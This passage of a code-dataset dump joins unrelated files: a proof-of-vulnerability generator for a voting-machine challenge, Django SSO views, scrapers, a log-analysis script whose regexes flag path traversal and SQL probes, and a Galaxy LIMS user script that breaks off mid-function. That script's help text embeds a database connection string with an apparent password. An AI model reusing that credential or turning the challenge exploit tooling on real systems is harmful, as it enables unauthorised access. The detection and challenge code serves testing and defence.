self._is_menu_id_valid_op(cmd):\n self._receive_by_len(self.VOTER_TURNOUT, term=CONFIG['TERM'])\n\n if 0 is self.state['e'].get_voter_count():\n self._receive_by_len(self.ZERO_VOTERS, term=CONFIG['TERM'])\n else:\n # get counts\n line = fmt.format(self.state['e'].get_voter_count(), self.state['e'].get_vote_count())\n self._receive_by_len(line)\n\n # get all voters\n self._receive_by_len(self.VOTER_ORDER, term=CONFIG['TERM'])\n for i in range(self.state['e'].get_voter_count()):\n # use a wild card recv for the names portion because python and C code\n # have different ordering when reading all values from a hash table.\n self._receive_by_delim(delim='\\n')\n\n self.state['e'].authd_user = None\n return 0\n else:\n self._receive_fail()\n return -1\n\n def _candidate_summary(self):\n '''\n Get the candidate summary\n '''\n self._process_menu()\n cmd = 0x58\n self._send_str(cmd)\n fmt = \"\\tNumber of candidates: {0}\\n\";\n\n if True == self._is_menu_id_valid_op(cmd):\n self._receive_by_len(self.CANDIDATE_SUMMARY, term=CONFIG['TERM'])\n\n if 0 is self.state['e'].get_voter_count():\n self._receive_by_len(self.ZERO_CANDIDATES, term=CONFIG['TERM'])\n else:\n # get counts\n line = fmt.format(self.state['e'].get_candidate_count())\n self._receive_by_len(line)\n\n # read candidate list\n v_res = self.state['e'].get_voting_results()\n self._receive_by_len(self.CANDIDATE_ORDER, term=CONFIG['TERM'])\n fmt = \"\\t{0}.\\t{1}\\t\"\n winners = 0\n for (count, c) in v_res:\n winners += 1\n line = fmt.format(winners, count)\n self._receive_by_len(line)\n # use a wild card recv for the name portion because python and C code\n # have different results from a sort with multiple equal sort-keys.\n self._receive_by_delim(delim='\\n')\n\n self.state['e'].authd_user = None\n return 0\n else:\n self._receive_fail()\n return -1\n\n\n def _quit(self):\n '''\n Quit cleanly\n '''\n self._process_menu()\n cmd = 0x5F\n self._send_str(cmd)\n return -1\n\n def start(self):\n self.state['e'] = Election()\n\n def init_state(self):\n '''\n Process the Election in the INIT state\n '''\n return self._create_election()\n\n def new_state(self):\n '''\n Process the Election in the NEW state\n '''\n # create some voters\n # for i in range(randint(5,15)):\n if 0 != self._register_voter():\n return -1\n\n # add a candidate\n if 0 != self._login(\"E_MGR\") or 0 != self._add_candidate():\n return -1\n\n # open voting\n if 0 != self._login(\"E_MGR\") or 0 != self._open_voting():\n return -1\n\n return 0\n\n def open_state(self):\n '''\n Process the Election in the OPEN state\n '''\n # do some voting\n # for v in range(5, self.state['e'].get_voter_count()):\n if 0 != self._login(\"VOTER\") or 0 != self._vote():\n return -1\n\n return 0\n\n\n def closed_state(self):\n '''\n Process the Election in the CLOSED state\n '''\n # check voting results\n if self.chance(0.5):\n if 0 != self._login(\"E_MGR\") or 0 != self._voting_results():\n return -1\n else:\n if 0 != self._login(\"VOTER\") or 0 != self._voting_results():\n return -1\n\n # check voter turnout\n if 0 != self._login(\"E_MGR\") or 0 != self._voter_turnout():\n return -1\n\n # check candidate summary\n if 0 != self._login(\"E_MGR\") or 0 != self._candidate_summary():\n return -1\n\n return 0\n\n\n\nHEAD=\"\"\"\n\n\nservice\n\n \n\"\"\"\n\nFLAG_READ=\"\"\"\n \"\"\"\n\nFOOT=\"\"\"\n \n voteid12341234\n \n voteid12341234\n\n\n\n\"\"\"\n\nimport os\nif __name__ == \"__main__\":\n POV_DIR=os.path.dirname(__file__)\n POV1_PATH=os.path.join(POV_DIR, 'POV_1c.povxml')\n # POV2_PATH=os.path.join(POV_DIR, 'POV_00002.povxml')\n\n tmpl1 = VotingMachine()\n tmpl1.start()\n tmpl1.init_state()\n tmpl1.new_state()\n tmpl1.open_state()\n tmpl1._quit()\n xml_body1 = HEAD.split(\"\\n\")\n xml_body1 += tmpl1.xml().split(\"\\n\")[5:-7]\n\n xml_body1 += FLAG_READ.split(\"\\n\")\n xml_body1 += tmpl1.xml().split(\"\\n\")[-7:-2]\n xml_body1 += FOOT.split(\"\\n\")\n combined_xml1 = \"\\n\".join(xml_body1)\n\n\n # if not os.path.exists(POV_DIR):\n # os.mkdir(POV_DIR)\n\n with open(POV1_PATH, 'w') as f:\n f.write(combined_xml1)\n\n # with open(POV2_PATH, 'w') as f:\n # f.write(combined_xml2)\n\n","sub_path":"challenges/One_Vote/support/genpov/genpov_1c.py","file_name":"genpov_1c.py","file_ext":"py","file_size_in_byte":25008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"551177341","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('contributors', '0005_auto_20150208_1230'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='identifier',\n name='name',\n field=models.TextField(max_length=256),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='identifier',\n name='type',\n field=models.CharField(max_length=16, choices=[('login', 'Debian/Alioth login'), ('fpr', 'OpenPGP key fingerprint'), ('email', 'Email address'), ('url', 'URL'), ('wiki', 'Wiki name')]),\n preserve_default=True,\n ),\n ]\n","sub_path":"contributors/migrations/0006_auto_20150817_1644.py","file_name":"0006_auto_20150817_1644.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"515695407","text":"import random\nimport numpy as np\nfrom collections import deque\n\nclass User:\n def __init__(self, name):\n self.name = name\n\nclass SocialGraph:\n def __init__(self):\n self.last_id = 0\n self.users = {}\n self.friendships = {}\n\n def add_friendship(self, user_id, friend_id):\n \"\"\"\n Creates a bi-directional friendship\n \"\"\"\n if user_id == friend_id:\n print(\"WARNING: You cannot be friends with yourself\")\n elif friend_id in self.friendships[user_id] or user_id in self.friendships[friend_id]:\n print(\"WARNING: Friendship already exists\")\n else:\n self.friendships[user_id].add(friend_id)\n self.friendships[friend_id].add(user_id)\n\n def add_user(self, name):\n \"\"\"\n Create a new user with a sequential integer ID\n \"\"\"\n self.last_id += 1 # automatically increment the ID to assign the new user\n self.users[self.last_id] = User(name)\n self.friendships[self.last_id] = set()\n\n def populate_graph(self, num_users, avg_friendships):\n \"\"\"\n Takes a number of users and an average number of friendships\n as arguments\n\n Creates that number of users and a randomly distributed friendships\n between those users.\n\n The number of users must be greater than the average number of friendships.\n \"\"\"\n # Reset graph\n self.last_id = 0\n self.users = {}\n self.friendships = {}\n\n # Add users\n for i in range(num_users):\n self.add_user(f\"User {i+1}\")\n\n # O(n) solution\n \n # Generate the number of friends each user will have\n # Uses a normal distribution to keep the average correct\n # The scale parameter is standard deviation\n friend_counts = np.random.normal(loc=avg_friendships,\n scale=avg_friendships/2,\n size=num_users)\n friend_counts = friend_counts.astype(int)\n\n # The set of all users, used in the next loop\n all_users = set(self.users.keys())\n\n # Generate the given number of friends for each user\n for u in all_users:\n # Check if enough friendships have already been made with this user\n count = friend_counts[u-1] - len(self.friendships[u])\n if count <= 0:\n continue\n\n # Get set of possible friends for this user\n possible = all_users.copy()\n possible.remove(u)\n\n # remove the friendships already made with this user\n possible = possible.difference(self.friendships[u])\n\n # Pick a random sample of those possible friends\n friends = random.sample(possible, count)\n\n # Create that those friendships\n for f in friends:\n self.add_friendship(u, f)\n\n # Original O(n^2) solution\n\n # # Generate all possible friendships combinations\n # # Avoid duplicates by ensuring 1st < 2nd\n # possible = []\n # for user_id in self.users:\n # for friend_id in range(user_id+1, self.last_id+1):\n # possible.append((user_id, friend_id))\n\n # # Shuffle friendships\n # random.shuffle(possible)\n\n # # Create N friendships, where N = num_users * avg_friendships / 2\n # for i in range(num_users * avg_friendships // 2):\n # self.add_friendship(*possible[i])\n\n def get_all_social_paths(self, user_id):\n \"\"\"\n Takes a user's user_id as an argument\n\n Returns a dictionary containing every user in that user's\n extended network with the shortest friendship path between them.\n\n The key is the friend's ID and the value is the path.\n \"\"\"\n \n # Perform breadth first search and save shortest path to each node\n # Start a queue with the initial user_id \n visited = {user_id : [user_id]}\n q = deque()\n q.append(user_id)\n\n while len(q) > 0: # while the queue is not empty\n current = q.popleft()\n for friend in self.friendships[current]: # check each friend\n # if we haven't already found a path to this friend...\n if friend not in visited:\n # the shortest path is the path to current + friend\n visited[friend] = visited[current].copy()\n visited[friend].append(friend)\n \n q.append(friend) # add this friend to the queue\n\n return visited\n\n\nif __name__ == '__main__':\n sg = SocialGraph()\n sg.populate_graph(100, 10)\n print(\"Friendships:\")\n print(sg.friendships)\n connections = sg.get_all_social_paths(1)\n print(\"Connections to id 1:\")\n print(connections)\n","sub_path":"projects/social/social.py","file_name":"social.py","file_ext":"py","file_size_in_byte":4857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"454053749","text":"import csv, json, geocoder, datetime, time\n\nformationTypes = [\n \"ORGANIZATION\",\n \"INCORPORATION\",\n \"INCORPORATED-B\"\n]\n\norganizationTypes = [\n \"ORG REPORT\",\n]\n\nconversionTypes = [\n \"CONVERSION-B\",\n \"ELECT B-STATUS\"\n]\n\nstructureTypes = {\n \"CIS\" : \"Domestic Stock Corporation\",\n \"LC\" : \"Domestic LLC\",\n \"BCORP\" : \"Domestic Benefit Corporation\"\n}\n\nwith open(\"bcorp-papertrail.csv\", \"r\") as dataFile:\n csvReader = csv.DictReader(dataFile)\n raw = [{k: (row[k]).strip() for k in row.keys()} for row in csvReader]\n\ndataObj = {}\n\nfor id in set([row[\"id_bus\"] for row in raw]):\n dataObj[id] = {\n \"name\" : False,\n \"formation\" : False,\n \"organization\" : False,\n \"conversion\" : False,\n \"address\" : False\n }\n\n# formation values\nfor formation in [row for row in raw if row[\"tx_certif\"] in formationTypes]:\n # dataObj[formation[\"id_bus\"]][\"name\"] = formation[\"nm_name\"].title()\n dataObj[formation[\"id_bus\"]][\"name\"] = formation[\"nm_name\"]\n\n dataObj[formation[\"id_bus\"]][\"formation\"] = {\n \"type\" : structureTypes[formation[\"cd_trans_type\"]],\n \"date\" : datetime.datetime.strptime(formation[\"tm_filing\"], \"%Y%m%d\").strftime(\"%b %d, %Y\")\n }\n\n # address\n if formation[\"ad_zip5\"] == \"\":\n dataObj[formation[\"id_bus\"]][\"address\"] = False\n else:\n dataObj[formation[\"id_bus\"]][\"address\"] = {\n \"street1\" : formation[\"ad_str1\"].title(),\n \"street2\" : formation[\"ad_str2\"].title(),\n \"street3\" : formation[\"ad_str3\"].title(),\n \"city\" : formation[\"ad_city\"].title(),\n \"zip\" : formation[\"ad_zip5\"],\n \"state\" : formation[\"ad_st\"]\n }\n # geocode address\n geoAddress = [\n dataObj[formation[\"id_bus\"]][\"address\"][\"street1\"]\n ]\n\n if dataObj[formation[\"id_bus\"]][\"address\"][\"street2\"] != \"\":\n geoAddress.append(dataObj[formation[\"id_bus\"]][\"address\"][\"street2\"])\n\n if dataObj[formation[\"id_bus\"]][\"address\"][\"street3\"] != \"\":\n geoAddress.append(dataObj[formation[\"id_bus\"]][\"address\"][\"street3\"])\n\n geoAddress +=[\n dataObj[formation[\"id_bus\"]][\"address\"][\"city\"],\n dataObj[formation[\"id_bus\"]][\"address\"][\"state\"],\n dataObj[formation[\"id_bus\"]][\"address\"][\"zip\"]\n ]\n\n # print(geoAddress)\n geoAddress = \",\".join(geoAddress)\n # print(geoAddress)\n # geocoder values\n geocode = geocoder.google(geoAddress)\n time.sleep(1)\n # print(geocode.latlng)\n dataObj[formation[\"id_bus\"]][\"address\"][\"geocode\"] = geocode.latlng\n\n# organization values\nfor organization in [row for row in raw if row[\"tx_certif\"] in organizationTypes]:\n dataObj[organization[\"id_bus\"]][\"organization\"] = {\n \"date\" : datetime.datetime.strptime(organization[\"tm_filing\"], \"%Y%m%d\").strftime(\"%b %d, %Y\")\n }\n\n# conversion values\nfor conversion in [row for row in raw if row[\"tx_certif\"] in conversionTypes]:\n dataObj[conversion[\"id_bus\"]][\"conversion\"] = {\n \"date\" : datetime.datetime.strptime(conversion[\"tm_filing\"], \"%Y%m%d\").strftime(\"%b %d, %Y\")\n }\n\n# convert object to list of objects - ditch business ID's\ndata = []\n\nfor id in dataObj:\n data.append(dataObj[id])\n\nwith open(\"dataObject.json\", \"w\") as outputFile:\n json.dump(dataObj, outputFile)\n\nwith open(\"data.json\", \"w\") as outputFile:\n json.dump(data, outputFile)","sub_path":"bcorp-table/static/data/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":3446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"21824868","text":"#셀레니움 연습하기\nfrom selenium import webdriver\nimport time\n\n#1. 웹드라이버 켜기\ndriver = webdriver.Chrome(\"./chromedriver\")\n#2. 네이버 지도 접속하기\ndriver.get(\"https://v4.map.naver.com/\")\n\ndriver.find_elements_by_css_selector(\"button.btn_close\")[1].click()\n#3. 검색창에 검색어 입력하기 // input#search-input\nsearch_box = driver.find_element_by_css_selector(\"input#search-input\")\nsearch_box.send_keys(\"치킨\")\n#4. 검색버튼 누르기 button.spm\nsearch_button = driver.find_element_by_css_selector(\"button.spm\")\nsearch_button.click()\n#5. 검색결과 확인하기\n\n\n\n# 컨테이너 dl.lsnx_det\n# 가게이름 dt > a\n# 가게주소 dd.addr\n# 전화번호 dd.tel\nfor n in range(1,6):\n # 지연시간\n time.sleep(1)\n\n stores = driver.find_elements_by_css_selector(\"dl.lsnx_det\")\n\n for s in stores:\n name = s.find_element_by_css_selector(\"dt > a\").text\n address = s.find_element_by_css_selector(\"dd.addr\").text\n #tel = s.find_element_by_css_selector(\"dd.tel\").text\n print(name)\n print(address)\n print(\"=\"*50)\n\n # 페이지버튼 div.paginate > *\n page_bar = driver.find_elements_by_css_selector(\"div.paginate > *\")\n page_bar[n+1].click()","sub_path":"웹크롤링/week6/week6_3.py","file_name":"week6_3.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"650712391","text":"import platform\nimport os.path\nimport shutil\nimport send2trash\nimport re\nfrom zipfile import ZipFile\nimport zipfile\n\ndef deleteFile():\n my_path = getPath()\n temp_file = \"\"\n fileNameRegex = re.compile(r'([a-z_]*\\.com)')\n access_logs_path = os.path.join(my_path,\"access_logs\")\n\n with open(os.path.join(my_path,'matches.txt'),'r') as text:\n for line in text:\n temp_file = temp_file + line\n \n for line in temp_file:\n fileName = fileNameRegex.findall(temp_file)\n\n for root, dirs, files in os.walk(access_logs_path):\n for file in files:\n if file not in fileName:\n send2trash.send2trash(os.path.join(root,file))\n send2trash.send2trash(root)\n\ndef final_zip():\n my_path = getPath()\n zip = zipfile.ZipFile(\"text_files\\\\results.zip\", \"w\")\n\n for root, subdirs, files in os.walk(my_path):\n zip.write(root)\n for file in files:\n zip.write(os.path.join(root,file))\n\ndef getRoot():\n my_system = platform.system()\n\n if my_system == \"Windows\":\n root_fs = \"C:\\\\\"\n else:\n root_fs = \"/\"\n\n final_filepath = os.path.join(root_fs)\n\n return final_filepath\n\ndef getCopyPath():\n my_system = platform.system()\n\n if my_system == \"Windows\":\n root_fs = \"C:\\\\\"\n else:\n root_fs = \"/\"\n\n final_filepath = os.path.join(root_fs, \"log_processing\")\n\n return final_filepath\n\ndef getPath():\n my_system = platform.system()\n\n if my_system == \"Windows\":\n root_fs = \"C:\\\\\"\n else:\n root_fs = \"/\"\n\n final_filepath = os.path.join(root_fs, \"logs\")\n\n return final_filepath\n\ndef moveFile():\n my_path = getPath()\n my_root = getRoot()\n\n file_to_move = input(\"What is the name of the file you would like to move? \")\n folder_to_move_to = input(\"What is the name of the folder you would like the file to be moved to? \")\n\n shutil.move(os.path.join(my_path,file_to_move), os.path.join(my_root,folder_to_move_to))\n\ndef readLogs():\n\n temp_data_set = \"\"\n filtered_IP_list = []\n filtered_file_list = []\n\n my_path = getPath()\n\n access_logs_path = os.path.join(my_path,\"access_logs\")\n\n for root, subdirs, files in os.walk(access_logs_path):\n for file in files:\n with open(os.path.join(root,file),'r') as logFile:\n for line in logFile:\n fileFound = re.search(r'(\\.)(\\.)(/)', line)\n if fileFound:\n temp_data_set = temp_data_set + line\n temp_data_set = temp_data_set + \" Filename: \" + str(file) + \"\\n\"\n wpFound = re.search(r'(/)(wp-login)(\\.)(php)(\\?)(action=register)', line)\n if wpFound:\n temp_data_set = temp_data_set + line\n temp_data_set = temp_data_set + \" Filename: \" + str(file) + \"\\n\"\n HTTPFound = re.search(r'\\b(\\d)(\\d)(\\d)?(\\d)?(\\d)?( )(403)\\b', line)\n if HTTPFound:\n temp_data_set = temp_data_set + line\n temp_data_set = temp_data_set + \" Filename: \" + str(file) + \"\\n\"\n selectFound = re.search(r'(select)', line)\n if selectFound:\n temp_data_set = temp_data_set + line\n temp_data_set = temp_data_set + \" Filename: \" + str(file) + \"\\n\"\n installFound = re.search(r'(install)', line)\n if installFound:\n temp_data_set = temp_data_set + line\n temp_data_set = temp_data_set + \" Filename: \" + str(file) + \"\\n\"\n\n IPRegex = re.compile(r'\\b(\\d)(\\d)?(\\d)?(\\.)(\\d)(\\d)?(\\d)?(\\.)(\\d)(\\d)?(\\d)?(\\.)(\\d)(\\d)?(\\d)?\\b')\n fileNameRegex = re.compile(r'([^\"]\\B [a-z_]*\\.com)')\n IPList = IPRegex.findall(temp_data_set)\n fileList = fileNameRegex.findall(temp_data_set)\n for IP in IPList:\n temp_IP = \"\"\n for item in IP:\n temp_IP = temp_IP + str(item.lstrip())\n if temp_IP not in filtered_IP_list:\n filtered_IP_list.append(temp_IP)\n for fileName in fileList:\n temp_file = \"\"\n for item in fileName:\n temp_file = temp_file + str(item.lstrip())\n if temp_file not in filtered_file_list:\n filtered_file_list.append(temp_file)\n\n final_info = dict(zip(filtered_IP_list, filtered_file_list))\n with open(os.path.join(my_path,'matches.txt'), 'w') as file:\n for key in final_info.items():\n file.write(\"%s,%s\\n\" % key)\n \ndef renameFile():\n my_path = getPath()\n my_return = os.walk(os.path.join(my_path,\"access_logs\"))\n\n for item in my_return:\n for filename in item[2]:\n temp_filename = \"processed_\" + filename\n shutil.move(os.path.join(item[0], filename), os.path.join(item[0], temp_filename))\n \ndef unzipFile():\n my_root = getRoot()\n \n os.chdir('week3\\\\assignment')\n\n if os.path.isdir(os.path.join(my_root, \"logs\")):\n with ZipFile('text_files\\\\access_logs.zip', 'r') as zipObj:\n zipObj.extractall(os.path.join(my_root, 'logs'))\n else:\n os.makedirs(os.path.join(my_root, 'logs'))\n with ZipFile('text_files\\\\access_logs.zip', 'r') as zipObj:\n zipObj.extractall(os.path.join(my_root, 'logs'))\n ","sub_path":"week3/assignment/functions/filesystem_functions.py","file_name":"filesystem_functions.py","file_ext":"py","file_size_in_byte":5345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"123353675","text":"# import urllib\n\n# from django.core.urlresolvers import reverse\n# from django.shortcuts import redirect\n# from django.views.generic.base import View, TemplateView\n# from django.http import HttpResponse\n# import socket\n\n# class LoginView(View):\n \n# def get(self, request, *args, **kwargs):\n# # check if user is already logged in\n# # if not, check if there is SSO info, and if so, log user in (maybe have to save info?)\n# print('in get')\n# print(request.GET.get('ReturnUrl'))\n# if (request.user.is_anonymous()):\n# print('--- cookies ---')\n# print(request.COOKIES)\n# print('get2')\n# print(settings.SESSION_COOKIE_NAME)\n# sso_return_url = request.GET.get('ReturnUrl')\n# print(sso_return_url)\n# if sso_return_url:\n# redirect_to = 'home'\n# else:\n# # If there is no login info, then redirect to the SSO\n# base_url = \"https://www.hospitalmedicine.org/Web/SHMLogin.aspx\"\n \n \n# local_url = \"https://django-sso-climberwb.c9users.io\"\n# return_url = \"/SSO/Copy_of_SSOLogin.aspx?HMRedirect=%s%s?ReturnUrl=/\" % (local_url, reverse('login'))\n# query_params = {\n# 'LoginRedirect': 'true',\n# 'returnUrl': return_url,\n# }\n \n# redirect_to = '%s?%s' % (base_url, urllib.urlencode(query_params))\n# return redirect(redirect_to)\n# else:\n# return redirect('home')\n \n \n# class HomeView(TemplateView):\n# template_name = 'sso_login/home.html'\n \n# def get_context_data(self, **kwargs):\n# print('in get_context_data')\n# print(self)\n# # TODO maybe remove this function\n# context = super(HomeView, self).get_context_data(**kwargs)\n# print(self)\n# return context\n \n \n\n### Questions\n\n# 1. Does the domain of the app thats using sso has to match the domain you are using (1 domain like spark example)\n# 2. Is the SSO config within imis configured correctly. Like encryption key, domain name. (We are trying to get the info once it comes back)\n\n# Possible things that can go wrong\n# 1. seems to be a cookie we can't access. \n\nimport urllib\nimport xmltodict\nimport urllib2\nimport httplib2\nimport os\nfrom httplib2 import Http as external_http\nimport socket\nfrom django.core.urlresolvers import reverse\nfrom django.shortcuts import redirect\nfrom django.views.generic.base import View, TemplateView\nfrom django.http import HttpResponse\n\nclass LoginView(View):\n \n def get(self, request, *args, **kwargs):\n # check if user is already logged in\n # if not, check if there is SSO info, and if so, log user in (maybe have to save info?)\n print('in get')\n print(socket.gethostname())\n print(socket.getfqdn())\n if (request.user.is_anonymous()):\n sso_return_url = request.GET.get('ReturnUrl')\n if sso_return_url:\n redirect_to = 'home'\n \n else:\n # If there is no login info, then redirect to the SSO\n base_url = \"http://www.hospitalmedicine.org/Web/SHMLogin.aspx\"\n local_url = \"https://django-sso-climberwb.c9users.io\"\n production_url = \"https://test.hospitalmedicine.org\"\n # For local uncomment\n if('ID' in os.environ ):\n production_url=local_url\n return_url = \"/SSO/Copy_of_SSOLogin.aspx?HMRedirect=%s%s?ReturnUrl=/\" % (production_url, reverse('login'))\n query_params = {\n 'LoginRedirect': 'true',\n 'returnUrl': return_url,\n }\n \n redirect_to = '%s?%s' % (base_url, urllib.urlencode(query_params))\n return redirect(redirect_to)\n else:\n return redirect('home')\n \n \nclass HomeView(TemplateView):\n template_name = 'sso_login/home.html'\n \n def get_context_data(self, **kwargs):\n # print('in get_context_data')\n # print(self)\n # TODO maybe remove this function\n print('--- cookies ---')\n print('cookie-id ',self.request.COOKIES.get('mytest'))\n useriMISID = self.request.COOKIES.get('mytest')\n # For Local Uncommment\n if('ID' in os.environ ):\n useriMISID = os.environ['ID'] \n\n username, first_name, last_name, member_type, has_bought = None, None, None, None, None\n\n ### CALL 1 to get user info\n if useriMISID:\n values_1 = dict(useriMISID=useriMISID)\n url_1 = 'http://www.hospitalmedicine.org/custom/service/shm_service.asmx/GetUserByUserID'\n data = urllib.urlencode(values_1)\n req = urllib2.Request(url_1, data)\n rsp = urllib2.urlopen(req)\n content_1 = rsp.read()\n print(rsp, content_1)\n obj = xmltodict.parse( content_1 )\n username = obj['UserInfo']['UserName']\n first_name = obj['UserInfo']['FirstName']\n last_name = obj['UserInfo']['LastName']\n member_type = obj['UserInfo']['MemberType']\n \n ### CALL 2 to get store info \n \n values_2 = dict(useriMISID=useriMISID,productCode='TEST_SURVEY')\n url_2 = 'http://www.hospitalmedicine.org/custom/service/shm_service.asmx/UserCanAccessProduct'\n data = urllib.urlencode(values_2)\n req = urllib2.Request(url_2, data)\n rsp = urllib2.urlopen(req)\n content_2 = rsp.read()\n print(rsp, content_2)\n obj_2 = xmltodict.parse( content_2 )\n has_bought = obj_2['boolean']['#text']\n context = super(HomeView, self).get_context_data(**kwargs)\n \n context['username'] =username\n context['firstname'] = first_name\n context['lastname'] = last_name\n context['membertype'] = member_type\n context['has_bought'] = has_bought\n return context\n \n \n\n### Questions\n\n# 1. Does the domain of the app thats using sso has to match the domain you are using (1 domain like spark example)\n# 2. Is the SSO config within imis configured correctly. Like encryption key, domain name. (We are trying to get the info once it comes back)\n\n# Possible things that can go wrong\n# 1. seems to be a cookie we can't access. \n\n","sub_path":"sso_login/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"427927014","text":"import re\nfrom subprocess import PIPE, CalledProcessError, run\n\nfrom django.core.exceptions import ValidationError\nfrom django.utils.translation import gettext as _\n\nfrom ..validators import validate_as_number\n\nINEXISTENT_ASN = _('ASN Does not exist.')\n\n\ndef get_whois(asn):\n try:\n validate_as_number(asn)\n data = run(['whois', 'AS' + str(asn)], stdout=PIPE)\n data.check_returncode()\n return data.stdout\n except (TypeError, ValidationError, CalledProcessError) as e:\n raise ValidationError(INEXISTENT_ASN)\n\n\ndef decode_line(line):\n try:\n return line.decode(\"utf-8\")\n except:\n return line.decode(\"latin1\")\n\n\ndef parse_whois(whois_content):\n if whois_content is None:\n raise ValidationError(INEXISTENT_ASN)\n\n final_list = list()\n line_break = False\n\n for line in whois_content.split(b'\\n'):\n decoded_line = decode_line(line)\n\n # If it's a blank line or a comment\n if final_list and re.match(r'^\\s*(?:%.*)?$', decoded_line):\n line_break = True\n\n # Tuple (field, value) with format field: value % possible comment\n match_content = re.match(r'^\\s*\\b([\\w\\d-]*):\\s*((?:(?! %.*$).)*)',\n decoded_line)\n if match_content:\n if line_break:\n final_list.append(('', ''))\n line_break = False\n final_list.append(match_content.groups())\n\n if not final_list:\n raise ValidationError(INEXISTENT_ASN)\n\n return final_list\n\n\ndef get_parsed_whois(asn):\n return parse_whois(get_whois(asn))\n","sub_path":"ipaxi/ixbr_api/core/utils/whoisutils.py","file_name":"whoisutils.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"44932619","text":"# 병합 정렬 알고리즘 \r\nfrom typing import MutableSequence\r\ndef MergeSort(a:MutableSequence) ->None:\r\n \"\"\"병합정렬\"\"\"\r\n def _merge_sort(a:MutableSequence, left:int, right:int) -> None:\r\n\r\n if left < right:\r\n center = (left + right) // 2\r\n\r\n _merge_sort(a,left,center)\r\n _merge_sort(a,center+1,right)\r\n\r\n p = j = 0\r\n i = k = left\r\n\r\n while i <= center:\r\n buff[p] = a[i]\r\n p+=1\r\n i+=1\r\n\r\n while i <= right and j < p:\r\n if buff[j] <= a[i]:\r\n a[k] = buff[j]\r\n j+=1\r\n\r\n else:\r\n a[k] = a[i]\r\n i+=1\r\n k+=1\r\n\r\n while j < p:\r\n a[k] = buff[j]\r\n k += 1\r\n j += 1\r\n \r\n n = len(a)\r\n buff = [None] * n\r\n _merge_sort(a,0,n-1)\r\n del buff \r\n\r\n\r\nif __name__ == '__main__':\r\n num = int(input('배열의 크기 : '))\r\n x = [None] * num\r\n\r\n for i in range(num):\r\n x[i] = int(input(f'x[{i}] : '))\r\n\r\n MergeSort(x)\r\n\r\n for i in range(num):\r\n print(f'{x[i]}',end=' ')","sub_path":"sort_algorithm/bubble_sort/merge_sort/merge_sort_list.py","file_name":"merge_sort_list.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"286494397","text":"#!/usr/bin/env python\n'''\nmanage_limsusers.py\n\nCreated by Anne Pajon on 02 Apr 2012\nCopyright (c) 2012 Cancer Research UK - Cambridge Research Institute.\n\nTesting creation of users\nssh uk-cri-lbio08\n\nTo connect to LIMS database\n/opt/local/server/database/mysql/bin/mysql -h uk-cri-lbio04 -u Galaxy -p\n\nTo connect to Galaxy database\n/opt/local/server/database/postgres/bin/psql -h localhost -p 5432 -U galaxy -d galaxy\n'''\n\nimport optparse\nimport logging as log\nimport os, sys\nfrom ConfigParser import SafeConfigParser\nfrom collections import defaultdict\n\ndef main() :\n # logging configuration\n log.basicConfig(format='%(levelname)s: %(message)s', level=log.DEBUG)\n\n # get the command line options\n parser = optparse.OptionParser()\n parser.add_option(\"--lims\", dest=\"lims_server\", action=\"store\", help=\"lims server driver://user[:password]@host[:port]/database (mysql://Galaxy:9414xy@uk-cri-lbio04/cri_general)\")\n parser.add_option(\"--dropall\", dest=\"dropall\", action=\"store_true\", default=False, help=\"drop all users/groups and their associated roles in Galaxy\")\n (options, args) = parser.parse_args()\n try:\n assert options.lims_server\n except:\n parser.print_help()\n sys.exit( 1 )\n\n # check env variable define\n if not os.environ['GALAXY_HOME']:\n log.error('Env variable $GALAXY_HOME is not set.')\n sys.exit(1)\n \n # set default Galaxy config file universe_wsgi.ini\n default_config = os.path.join( os.environ['GALAXY_HOME'] , 'universe_wsgi.ini')\n if not os.path.isfile(default_config):\n log.error('Default Galaxy config file %s does not exist.' % default_config)\n sys.exit(1)\n config = os.path.abspath( default_config )\n os.chdir( os.path.dirname( config ) )\n sys.path.append( 'lib' )\n\n # import Galaxy\n from galaxy import eggs\n import pkg_resources\n pkg_resources.require( \"SQLAlchemy >= 0.4\" )\n from sqlalchemy.ext.sqlsoup import SqlSoup\n\n # parse config file\n config = SafeConfigParser()\n config.read( os.path.basename( default_config ) )\n\n # get Galaxy database connection\n galaxy_db = config.get( \"app:main\", \"database_connection\" )\n from galaxy.model import mapping\n model = mapping.init( config.get( 'app:main', 'file_path' ), config.get( 'app:main', 'database_connection' ), create_tables = False )\n session = model.session\n\n # get CRI lims database connection\n lims_db = SqlSoup(options.lims_server)\n\n if options.dropall:\n dropall(config, model, session)\n else:\n create_limsusers(model, session, lims_db)\n\ndef dropall(config, model, session):\n # query Galaxy db to get users & groups & roles\n galaxy_users = session.query(model.User)\n galaxy_groups = session.query(model.Group)\n galaxy_roles = session.query(model.Role)\n galaxy_grouproles = session.query(model.GroupRoleAssociation)\n galaxy_usergroups = session.query(model.UserGroupAssociation).join(model.User)\n # get Galaxy admin users\n admin_users = config.get('app:main', 'admin_users').split(',')\n for admin_user in admin_users:\n log.debug(\"Admin email user %s\" % admin_user)\n # delete all associations first\n for association in galaxy_grouproles:\n session.delete(association)\n log.debug(\"Deleting association %s\" % association.id)\n for association in galaxy_usergroups:\n if not association.user.email in admin_users:\n session.delete(association)\n log.debug(\"Deleting association %s with user %s\" % (association.id, association.user.email))\n # delete all users except 